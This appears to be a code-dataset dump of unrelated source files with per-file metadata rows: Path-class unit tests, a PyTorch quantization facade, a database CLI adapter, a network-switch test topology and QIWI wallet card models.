self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
def test_path_replaces_context_braces(self):
self.p = Path("${ROOT_DIR}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env_braces(self):
self.p = Path("${HOME}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leave_unknown_variable_in_tact_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/${FOO}/thefile.$F.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
class PathLengthTest(unittest.TestCase):
def test_len_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(len(self.p), 12)
def test_len_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(len(self.p), 10)
def test_depth_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_literal_rel_path(self):
self.p = Path("aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
class AbsolutePathCollapseDotsTest(unittest.TestCase):
def test_path_collapses_single_dot(self):
p = Path("/a/b/./c")
self.assertEqual(p.fslash(), "/a/b/c")
def test_path_collapses_double_dot(self):
p = Path("/a/b/../c")
self.assertEqual(p.fslash(), "/a/c")
def test_path_collapses_many_single_dots(self):
p = Path("/a/b/./c/././d")
self.assertEqual(p.fslash(), "/a/b/c/d")
def test_path_collapses_many_consecutive_double_dots(self):
p = Path("/a/b/c/../../d")
self.assertEqual(p.fslash(), "/a/d")
def test_path_collapses_many_non_consecutive_double_dots(self):
p = Path("/a/b/c/../../d/../e/f/../g")
self.assertEqual(p.fslash(), "/a/e/g")
def test_path_collapses_many_non_consecutive_mixed_dots(self):
p = Path("/a/./b/c/../.././d/../././e/f/../g/./")
self.assertEqual(p.fslash(), "/a/e/g")
self.assertEqual(p.depth, 3)
def test_path_collapses_to_root(self):
p = Path("/a/b/../../")
self.assertEqual(p.fslash(), "/")
self.assertEqual(p.depth, 0)
def test_raise_when_collapse_too_many_dots(self):
with self.assertRaises(ValueError):
Path("/a/b/../../../")
class RelativePathCollapseDotsTest(unittest.TestCase):
def test_resolve_relative_several_dots(self):
p = Path("./a/b/../../../c/d")
self.assertEqual(p.fslash(), "../c/d")
self.assertEqual(p.all_components, ["..", "c", "d"])
self.assertEqual(p.depth, 3)
def test_resolve_leading_relative_dots(self):
p = Path("../c/d")
self.assertEqual(p.fslash(), "../c/d")
def test_resolve_leading_relative_dots(self):
p = Path("../../../c/d")
self.assertEqual(p.fslash(), "../../../c/d")
def test_resolve_only_relative_dots(self):
p = Path("../../../")
self.assertEqual(p.fslash(), "../../../")
def test_collapse_contained_components(self):
p = Path("../../../a/b/../../../")
self.assertEqual(p.fslash(), "../../../../")
def test_remove_trailing_dot(self):
p = Path("../../.././")
self.assertEqual(p.fslash(), "../../../")
def test_cwd(self):
p = Path(".")
self.assertEqual(p.fslash(), "./")
def test_down_up_cwd(self):
p = Path("a/..")
self.assertEqual(p.fslash(), "./")
def test_up_down_sibling(self):
p = Path("../a")
self.assertEqual(p.fslash(), "../a")
def test_up_down_sibling_bslash(self):
p = Path("../a")
self.assertEqual(p.bslash(), "..\\a")
class PathComponentsTest(unittest.TestCase):
def test_path_gets_tail(self):
p = Path("/a/b/c")
self.assertEqual(p.tail, "c")
def test_path_gets_none_when_no_tail(self):
p = Path("/")
self.assertEqual(p.tail, None)
def test_path_ends_with(self):
p = Path("/a/b/cdef")
self.assertTrue(p.endswith("ef"))
def test_path_not_ends_with(self):
p = Path("/a/b/cdef")
self.assertFalse(p.endswith("eg"))
class RelativePathTest(unittest.TestCase):
def test_rel_path_does_not_raise(self):
p = Path("a/b/c")
self.assertEqual(p.fslash(), "a/b/c")
class EqualityTests(unittest.TestCase):
def test_paths_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/c")
self.assertTrue(p1 == p2)
def test_same_object_equal(self):
p1 = Path("a/b/c")
self.assertTrue(p1 == p1)
def test_different_paths_equal_false(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertFalse(p1 == p2)
def test_paths_not_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertTrue(p1 != p2)
class InitializeWithComponentsTests(unittest.TestCase):
def test_initialize_with_lettered_components(self):
p = Path(["C:", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "C:/a/b/c")
def test_initialize_with_backslash_unc_components(self):
p = Path(["\\", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_fwslash_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "\\\\a\\b\\c")
def test_initialize_with_relative_components(self):
p = Path(["a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "a\\b\\c")
def test_initialize_with_relative_components_is_relative(self):
p = Path(["a", "b", "c"])
self.assertTrue(p.relative)
self.assertFalse(p.absolute)
class GetComponentsTests(unittest.TestCase):
def test_get_all_components(self):
p = Path("/a/b/c")
self.assertEqual(p.all_components, ["a", "b", "c"])
def test_get_all_components_with_drive(self):
p = Path("C:/a/b/c")
self.assertEqual(p.all_components, ["C:", "a", "b", "c"])
def test_get_all_components_with_unc_fwslash(self):
p = Path("//a/b/c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
def test_get_all_components_with_unc_backslash(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
class UNCTests(unittest.TestCase):
def test_unc_root_with_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_unc_is_absolute(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.absolute)
def test_unc_root_without_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=False), "/a/b/c")
def test_unc_root_with_forward(self):
p = Path("//a/b/c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_is_unc(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.is_unc)
p = Path("//a/b/c")
self.assertTrue(p.is_unc)
def test_posix_abs_is_not_unc(self):
p = Path(["/a/b/c"])
self.assertFalse(p.is_unc)
def test_relative_is_not_unc(self):
p = Path(["a/b/c"])
self.assertFalse(p.is_unc)
def test_drive_letter_is_not_unc(self):
p = Path("C:\\aaa\\bbb\\c")
self.assertFalse(p.is_unc)
if __name__ == "__main__":
unittest.main()
| 32.620614 | 93 | 0.604034 | 2,099 | 14,875 | 4.079562 | 0.093378 | 0.067733 | 0.028378 | 0.086418 | 0.75616 | 0.698937 | 0.67815 | 0.645101 | 0.600958 | 0.55588 | 0 | 0.003749 | 0.210891 | 14,875 | 455 | 94 | 32.692308 | 0.725762 | 0.004571 | 0 | 0.324324 | 0 | 0 | 0.137199 | 0.046634 | 0 | 0 | 0 | 0 | 0.294294 | 1 | 0.264264 | false | 0 | 0.024024 | 0 | 0.345345 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b188c34a63c4e8f52180a384c6fb116f6a431c46 | 7,184 | py | Python | model_compression_toolkit/gptq/pytorch/quantization_facade.py | ofirgo/model_optimization | 18be895a35238df128913183b05e60550c2b6e6b | [
"Apache-2.0"
] | 42 | 2021-10-31T10:17:49.000Z | 2022-03-21T08:51:46.000Z | model_compression_toolkit/gptq/pytorch/quantization_facade.py | ofirgo/model_optimization | 18be895a35238df128913183b05e60550c2b6e6b | [
"Apache-2.0"
] | 6 | 2021-10-31T15:06:03.000Z | 2022-03-31T10:32:53.000Z | model_compression_toolkit/gptq/pytorch/quantization_facade.py | ofirgo/model_optimization | 18be895a35238df128913183b05e60550c2b6e6b | [
"Apache-2.0"
] | 18 | 2021-11-01T12:16:43.000Z | 2022-03-25T16:52:37.000Z | # Copyright 2022 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Callable
from model_compression_toolkit.core import common
from model_compression_toolkit.core.common import Logger
from model_compression_toolkit.core.common.constants import PYTORCH
from model_compression_toolkit.gptq.common.gptq_config import GradientPTQConfig
from model_compression_toolkit.core.common.target_platform import TargetPlatformCapabilities
from model_compression_toolkit.core.common.mixed_precision.kpi import KPI
from model_compression_toolkit.core.common.framework_info import FrameworkInfo
from model_compression_toolkit import CoreConfig
from model_compression_toolkit.core.common.mixed_precision.mixed_precision_quantization_config import \
MixedPrecisionQuantizationConfigV2
from model_compression_toolkit.core.common.post_training_quantization import post_training_quantization
import importlib
if importlib.util.find_spec("torch") is not None:
from model_compression_toolkit.core.pytorch.default_framework_info import DEFAULT_PYTORCH_INFO
from model_compression_toolkit.core.pytorch.pytorch_implementation import PytorchImplementation
from model_compression_toolkit.core.pytorch.constants import DEFAULT_TP_MODEL
from torch.nn import Module
from model_compression_toolkit import get_target_platform_capabilities
DEFAULT_PYTORCH_TPC = get_target_platform_capabilities(PYTORCH, DEFAULT_TP_MODEL)
def pytorch_gradient_post_training_quantization_experimental(in_module: Module,
representative_data_gen: Callable,
target_kpi: KPI = None,
core_config: CoreConfig = CoreConfig(),
fw_info: FrameworkInfo = DEFAULT_PYTORCH_INFO,
gptq_config: GradientPTQConfig = None,
target_platform_capabilities: TargetPlatformCapabilities = DEFAULT_PYTORCH_TPC):
"""
Quantize a trained Pytorch module using post-training quantization.
By default, the module is quantized using a symmetric constraint quantization thresholds
(power of two) as defined in the default TargetPlatformCapabilities.
The module is first optimized using several transformations (e.g. BatchNormalization folding to
preceding layers). Then, using a given dataset, statistics (e.g. min/max, histogram, etc.) are
being collected for each layer's output (and input, depends on the quantization configuration).
Thresholds are then being calculated using the collected statistics and the module is quantized
(both coefficients and activations by default).
If gptq_config is passed, the quantized weights are optimized using gradient based post
training quantization by comparing points between the float and quantized modules, and minimizing the
observed loss.
Args:
in_module (Module): Pytorch module to quantize.
representative_data_gen (Callable): Dataset used for calibration.
target_kpi (KPI): KPI object to limit the search of the mixed-precision configuration as desired.
core_config (CoreConfig): Configuration object containing parameters of how the model should be quantized, including mixed precision parameters.
fw_info (FrameworkInfo): Information needed for quantization about the specific framework (e.g., kernel channels indices, groups of layers by how they should be quantized, etc.). `Default PyTorch info <https://github.com/sony/model_optimization/blob/main/model_compression_toolkit/core/pytorch/default_framework_info.py>`_
gptq_config (GradientPTQConfig): Configuration for using gptq (e.g. optimizer).
target_platform_capabilities (TargetPlatformCapabilities): TargetPlatformCapabilities to optimize the PyTorch model according to. `Default PyTorch TPC <https://github.com/sony/model_optimization/blob/main/model_compression_toolkit/core/tpc_models/pytorch_tp_models/pytorch_default.py>`_
Returns:
A quantized module and information the user may need to handle the quantized module.
Examples:
Import a Pytorch module:
>>> import torchvision.models.mobilenet_v2 as models
>>> module = models.mobilenet_v2()
Create a random dataset generator:
>>> import numpy as np
>>> def repr_datagen(): return [np.random.random((1,224,224,3))]
Import mct and pass the module with the representative dataset generator to get a quantized module:
>>> import model_compression_toolkit as mct
>>> quantized_module, quantization_info = mct.pytorch_post_training_quantization(module, repr_datagen)
"""
if core_config.mixed_precision_enable:
if not isinstance(core_config.mixed_precision_config, MixedPrecisionQuantizationConfigV2):
common.Logger.error("Given quantization config to mixed-precision facade is not of type "
"MixedPrecisionQuantizationConfigV2. Please use pytorch_post_training_quantization API,"
"or pass a valid mixed precision configuration.")
common.Logger.info("Using experimental mixed-precision quantization. "
"If you encounter an issue please file a bug.")
return post_training_quantization(in_module,
representative_data_gen,
core_config,
fw_info,
PytorchImplementation(),
target_platform_capabilities,
gptq_config,
target_kpi=target_kpi)
else:
# If torch is not installed,
# we raise an exception when trying to use these functions.
def pytorch_gradient_post_training_quantization_experimental(*args, **kwargs):
Logger.critical('Installing Pytorch is mandatory '
'when using pytorch_gradient_post_training_quantization_experimental. '
'Could not find the torch package.')
| 60.369748 | 334 | 0.680122 | 783 | 7,184 | 6.058748 | 0.321839 | 0.057336 | 0.08242 | 0.07968 | 0.177909 | 0.157462 | 0.090852 | 0.068086 | 0.029511 | 0.029511 | 0 | 0.003956 | 0.260997 | 7,184 | 118 | 335 | 60.881356 | 0.889621 | 0.464226 | 0 | 0 | 0 | 0 | 0.120762 | 0.035304 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0.021277 | 0.382979 | 0 | 0.446809 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
b18ee92e764bf93ddc723331ee49b72f1366542a | 4,403 | py | Python | adapters/adapter.py | ChristfriedBalizou/jeamsql | abd7735831b572f1f1a2d8e47b0759801fd5881c | [
"MIT"
] | null | null | null | adapters/adapter.py | ChristfriedBalizou/jeamsql | abd7735831b572f1f1a2d8e47b0759801fd5881c | [
"MIT"
] | null | null | null | adapters/adapter.py | ChristfriedBalizou/jeamsql | abd7735831b572f1f1a2d8e47b0759801fd5881c | [
"MIT"
] | null | null | null | from tabulate.tabulate import tabulate
import subprocess
import sys
import os
import re
import csv
import io
import json
class Adapter(object):
def __init__(self,
server=None,
port=None,
user=None,
connection_cmd=None,
cmd=None,
test_query=None,
database=None,
error_regex=None,
password=None,
fmt="sql"):
'''
The init function contain the connection parameters
to initiate the database instance.
'''
self.server = server
self.port = port
self.user = user
self.database = database
self.password = password
self.cmd = cmd
self.test_query = test_query
self.connection_cmd = connection_cmd
self.error_regex=error_regex
self.fmt = fmt
self.__connection__ = None
def connect(self, test=True):
'''
Open a connection to the database.
'''
if not self.__program_exist__():
raise Exception("Command %s is not installed. the connection failed."
% self.cmd)
self.__connection__ = subprocess.Popen(
self.connection_cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
if test is True:
try:
self.__connection__.communicate(input=self.test_query)
print 'Connection openned successfuly.'
except Exception:
raise
def execute(self, query):
'''
Execute run sql query commande whithout return
results.
'''
try:
self.connect(test=False)
except:
pass
def select(self, query=None, fmt=None):
'''
Runs command and "always" return dictionary array
'''
self.connect(test=False)
def close(self):
'''
Close database connection
'''
self.__connection__.communicate(input="quit")
self.__connection__.kill()
print "Connection closed successfuly."
self.__connection__ = None
def tables(self, name=None, fmt=None):
'''
List all tables. If name is given return the
requested or None
'''
self.connect(test=False)
def description(self, table_name=None, fmt=None):
'''
List all table with descriptions
(table => fields => column : type)
If table_name is given only specified
will be listed
'''
self.connect(test=False)
def __program_exist__(self):
if self.cmd is None:
return True
try:
for cmd in self.cmd:
with open(os.devnull, 'w') as devnull:
subprocess.call([cmd], stderr=devnull)
return True
except OSError as e:
if e.errno == os.errno.ENOENT:
return False
return True
def __runsql__(self, sql, fmt=None):
pass
def has_error(self, output):
'''
Check if response from sql server came with error
'''
if self.error_regex is not None:
if re.search(self.error_regex, output) is not None:
return True
return False
def to_response(self, output, fmt=None):
'''
Marshall csv to dictionary
'''
if fmt == "csv":
return output.encode("utf-8").replace("\t", ",")
docs = []
with io.StringIO(output) as infile:
if fmt == "json":
return self.__to_dict__(infile)
if fmt == "sql":
return self.__to_table__(infile)
if fmt is None:
if self.fmt is "json":
return self.__to_dict__(infile)
return self.__to_table__(infile)
def __to_table__(self, infile):
reader = csv.reader(infile, delimiter='\t')
headers = reader.next()
return tabulate(reader, headers, tablefmt="orgtbl")
def __to_dict__(self, infile):
docs = []
for row in csv.DictReader(infile, delimiter='\t'):
doc = {key: value for key, value in row.items()}
docs.append(doc)
return json.dumps(docs, indent=4)
| 24.461111 | 81 | 0.539859 | 476 | 4,403 | 4.806723 | 0.302521 | 0.048951 | 0.026224 | 0.034965 | 0.09222 | 0.041958 | 0 | 0 | 0 | 0 | 0 | 0.000723 | 0.371792 | 4,403 | 179 | 82 | 24.597765 | 0.826464 | 0 | 0 | 0.219048 | 0 | 0 | 0.041839 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.038095 | 0.07619 | null | null | 0.019048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b192ffd8dc0dbef0c193761ff4f0641070958f09 | 3,384 | py | Python | topologies/dc_t1.py | andriymoroz/sai-challenger | 665f5dbff8c797cfd55cc0c13b03a77aefdb9977 | [
"Apache-2.0"
] | 11 | 2021-04-23T05:54:05.000Z | 2022-03-29T16:37:42.000Z | topologies/dc_t1.py | andriymoroz/sai-challenger | 665f5dbff8c797cfd55cc0c13b03a77aefdb9977 | [
"Apache-2.0"
] | 4 | 2021-06-02T11:05:31.000Z | 2021-11-26T14:39:50.000Z | topologies/dc_t1.py | andriymoroz/sai-challenger | 665f5dbff8c797cfd55cc0c13b03a77aefdb9977 | [
"Apache-2.0"
] | 14 | 2021-02-27T15:17:31.000Z | 2021-11-01T10:15:51.000Z | from contextlib import contextmanager
import pytest
from sai import SaiObjType
@contextmanager
def config(npu):
topo_cfg = {
"lo_rif_oid": None,
"cpu_port_oid": None,
}
# Create Loopback RIF
lo_rif_oid = npu.create(SaiObjType.ROUTER_INTERFACE,
[
"SAI_ROUTER_INTERFACE_ATTR_VIRTUAL_ROUTER_ID", npu.default_vrf_oid,
"SAI_ROUTER_INTERFACE_ATTR_TYPE", "SAI_ROUTER_INTERFACE_TYPE_LOOPBACK",
"SAI_ROUTER_INTERFACE_ATTR_MTU", "9100"
])
topo_cfg["lo_rif_oid"] = lo_rif_oid
# Get CPU port
cpu_port_oid = npu.get(npu.oid, ["SAI_SWITCH_ATTR_CPU_PORT", "oid:0x0"]).oid()
topo_cfg["cpu_port_oid"] = cpu_port_oid
# Get port HW lanes
for oid in npu.port_oids:
port_lanes = npu.get(oid, ["SAI_PORT_ATTR_HW_LANE_LIST", "8:0,0,0,0,0,0,0,0"]).to_list()
# Remove default VLAN members
vlan_mbr_oids = npu.get_list(npu.default_vlan_oid, "SAI_VLAN_ATTR_MEMBER_LIST", "oid:0x0")
for oid in vlan_mbr_oids:
npu.remove(oid)
# Remove default 1Q bridge members
dot1q_mbr_oids = npu.get_list(npu.dot1q_br_oid, "SAI_BRIDGE_ATTR_PORT_LIST", "oid:0x0")
for oid in dot1q_mbr_oids:
bp_type = npu.get(oid, ["SAI_BRIDGE_PORT_ATTR_TYPE", "SAI_BRIDGE_PORT_TYPE_PORT"]).value()
if bp_type == "SAI_BRIDGE_PORT_TYPE_PORT":
npu.remove(oid)
npu.dot1q_bp_oids.clear()
# Create default routes
npu.create_route("0.0.0.0/0", npu.default_vrf_oid, None,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"])
npu.create_route("::/0", npu.default_vrf_oid, None,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"])
# Create Loopback RIF routes
npu.create_route("fe80::5054:ff:fe12:3456/128", npu.default_vrf_oid, cpu_port_oid,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"])
npu.create_route("fe80::/10", npu.default_vrf_oid, cpu_port_oid,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"])
yield topo_cfg
# TODO: TEARDOWN
# Remove default routes
npu.remove_route("fe80::/10", npu.default_vrf_oid)
npu.remove_route("fe80::5054:ff:fe12:3456/128", npu.default_vrf_oid)
npu.remove_route("::/0", npu.default_vrf_oid)
npu.remove_route("0.0.0.0/0", npu.default_vrf_oid)
# Create default 1Q bridge members
for oid in npu.port_oids:
bp_oid = npu.create(SaiObjType.BRIDGE_PORT,
[
"SAI_BRIDGE_PORT_ATTR_TYPE", "SAI_BRIDGE_PORT_TYPE_PORT",
"SAI_BRIDGE_PORT_ATTR_PORT_ID", oid,
# "SAI_BRIDGE_PORT_ATTR_BRIDGE_ID", dot1q_br.oid(),
"SAI_BRIDGE_PORT_ATTR_ADMIN_STATE", "true"
])
npu.dot1q_bp_oids.append(bp_oid)
# Create default VLAN members and set PVID
for idx, oid in enumerate(npu.port_oids):
npu.create_vlan_member(npu.default_vlan_oid, npu.dot1q_bp_oids[idx], "SAI_VLAN_TAGGING_MODE_UNTAGGED")
npu.set(oid, ["SAI_PORT_ATTR_PORT_VLAN_ID", npu.default_vlan_id])
# Remove Loopback RIF
npu.remove(lo_rif_oid)
| 40.285714 | 110 | 0.637411 | 477 | 3,384 | 4.100629 | 0.178197 | 0.015337 | 0.018405 | 0.07362 | 0.445808 | 0.367076 | 0.293456 | 0.265337 | 0.244888 | 0.244888 | 0 | 0.031113 | 0.259161 | 3,384 | 83 | 111 | 40.771084 | 0.749103 | 0.100768 | 0 | 0.185185 | 0 | 0 | 0.295575 | 0.251321 | 0 | 0 | 0.002972 | 0.012048 | 0 | 1 | 0.018519 | false | 0 | 0.055556 | 0 | 0.074074 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b193f13f0d572526822d816991b5f3105ef56820 | 7,045 | py | Python | asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py | LexLuthorReal/asynchronous_qiwi | 5847a8d4008493656e973e5283888a4e57234962 | [
"MIT"
] | 3 | 2021-05-20T02:36:30.000Z | 2021-11-28T16:00:15.000Z | asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py | LexLuthorReal/asynchronous_qiwi | 5847a8d4008493656e973e5283888a4e57234962 | [
"MIT"
] | null | null | null | asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py | LexLuthorReal/asynchronous_qiwi | 5847a8d4008493656e973e5283888a4e57234962 | [
"MIT"
] | 1 | 2021-11-28T16:00:20.000Z | 2021-11-28T16:00:20.000Z | from loguru import logger
import datetime
from pydantic.fields import ModelField
from typing import Optional, List, Union, Any
from ....utils.tools.str_datetime import convert
from pydantic import BaseModel, Field, validator, ValidationError
from ....data_types.QIWIWallet.list_qvc import ReleasedCardStatus, CardType, CardAlias
class AmountData(BaseModel):
"""Object: \"AmountData\""""
amount: float = Field(..., alias="amount")
currency: str = Field(..., alias="currency")
class Requisites(BaseModel):
name: str = Field(..., alias="name")
value: str = Field(..., alias="value")
class Details(BaseModel):
info: str = Field(..., alias="info")
description: str = Field(..., alias="description")
tariff_link: str = Field(..., alias="tariffLink")
offer_link: str = Field(..., alias="offerLink")
features: List[Any] = Field(..., alias="features")
requisites: List[Union[Requisites]] = Field(..., alias="requisites")
class Info(BaseModel):
id: int = Field(..., alias="id")
name: str = Field(..., alias="name")
alias: Union[str, CardAlias] = Field(..., alias="alias")
price: AmountData = Field(..., alias="price")
period: str = Field(..., alias="period")
type: Union[str, CardAlias] = Field(..., alias="type")
details: Details = Field(..., alias="details")
@validator("alias")
def alias_type(cls, alias: Union[str, CardAlias], field: ModelField) -> CardAlias:
if isinstance(alias, str):
try:
alias = CardAlias(alias)
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return alias
elif isinstance(alias, CardAlias):
return alias
raise ValidationError(model=Info)
@validator("type")
def card_type_type(cls, card_type: Union[str, CardAlias], field: ModelField) -> CardAlias:
if isinstance(card_type, str):
try:
card_type = CardAlias[card_type]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return card_type
elif isinstance(card_type, CardAlias):
return card_type
raise ValidationError(model=Info)
class QVX(BaseModel):
id: int = Field(..., alias="id")
masked_pan: str = Field(..., alias="maskedPan")
status: Optional[Union[str, ReleasedCardStatus]] = Field(..., alias="status")
card_expire: Optional[Union[str, datetime.datetime]] = Field(..., alias="cardExpire")
card_type: Optional[Union[str, CardType]] = Field(..., alias="cardType")
card_alias: str = Field(..., alias="cardAlias")
card_limit: Optional[str] = Field(..., alias="cardLimit")
activated: Optional[Union[str, datetime.datetime]] = Field(..., alias="activated")
sms_resended: Optional[Union[str, datetime.datetime]] = Field(..., alias="smsResended")
post_number: Optional[str] = Field(..., alias="postNumber")
blocked_date: Optional[Union[str, datetime.datetime]] = Field(..., alias="blockedDate")
full_pan: Optional[str] = Field(..., alias="fullPan")
card_id: int = Field(..., alias="cardId")
txn_id: str = Field(..., alias="txnId")
card_expire_month: str = Field(..., alias="cardExpireMonth")
card_expire_year: str = Field(..., alias="cardExpireYear")
@validator('status')
def status_types(cls, status: Union[str, ReleasedCardStatus], field: ModelField) -> ReleasedCardStatus:
if isinstance(status, str):
try:
status = ReleasedCardStatus[status]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return status
elif isinstance(status, ReleasedCardStatus):
return status
raise ValidationError(model=QVX)
@validator('card_expire')
def card_expire_datetime(cls, card_expire: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(card_expire, str):
card_expire = convert(value=card_expire, validator_name=field.name.upper(), alert=False)
return card_expire
elif isinstance(card_expire, datetime.datetime):
return card_expire
elif card_expire is None:
return card_expire
raise ValidationError(model=QVX)
@validator('card_type')
def card_types(cls, card_type: Union[str, CardType], field: ModelField) -> CardType:
if isinstance(card_type, str):
try:
card_type = CardType[card_type]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return card_type
elif isinstance(card_type, CardType):
return card_type
raise ValidationError(model=QVX)
@validator('activated')
def activated_datetime(cls, activated: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(activated, str):
activated = convert(value=activated, validator_name=field.name.upper(), alert=False)
return activated
elif isinstance(activated, datetime.datetime):
return activated
elif activated is None:
return activated
raise ValidationError(model=QVX)
@validator('sms_resended')
def sms_resended_datetime(cls, sms_resended: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(sms_resended, str):
sms_resended = convert(value=sms_resended, validator_name=field.name.upper(), alert=False)
return sms_resended
elif isinstance(sms_resended, datetime.datetime):
return sms_resended
elif sms_resended is None:
return sms_resended
raise ValidationError(model=QVX)
@validator('blocked_date')
def blocked_date_datetime(cls, blocked_date: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(blocked_date, str):
blocked_date = convert(value=blocked_date, validator_name=field.name.upper(), alert=False)
return blocked_date
elif isinstance(blocked_date, datetime.datetime):
return blocked_date
elif blocked_date is None:
return blocked_date
raise ValidationError(model=QVX)
class ListCard(BaseModel):
qvx: QVX = Field(..., alias="qvx")
balance: Optional[AmountData] = Field(..., alias="balance")
info: Info = Field(..., alias="info")
features: List[Any] = Field(..., alias="features")
class ListCardMaster(BaseModel):
data: List[Union[ListCard]] = Field(..., alias="data")
| 41.686391 | 107 | 0.628957 | 753 | 7,045 | 5.776892 | 0.14077 | 0.087356 | 0.050805 | 0.044138 | 0.413793 | 0.361839 | 0.297931 | 0.28069 | 0.163678 | 0.163678 | 0 | 0 | 0.239461 | 7,045 | 168 | 108 | 41.934524 | 0.81187 | 0.002839 | 0 | 0.386207 | 0 | 0 | 0.073383 | 0.011969 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055172 | false | 0 | 0.048276 | 0 | 0.551724 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
b194d8469a9b5649a06d4a8f9eab020579871edb | 818 | py | Python | src/mciso/visualize.py | lancechua/mciso | 2fd406b7c54f9cb6b331ae8ad3470d1f47696494 | [
"MIT"
] | 2 | 2021-08-06T14:20:37.000Z | 2022-03-29T16:13:10.000Z | src/mciso/visualize.py | lancechua/mciso | 2fd406b7c54f9cb6b331ae8ad3470d1f47696494 | [
"MIT"
